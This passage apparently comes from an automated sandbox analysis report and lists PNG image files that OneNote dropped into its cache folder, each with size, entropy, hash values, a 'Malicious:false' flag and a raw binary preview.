                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
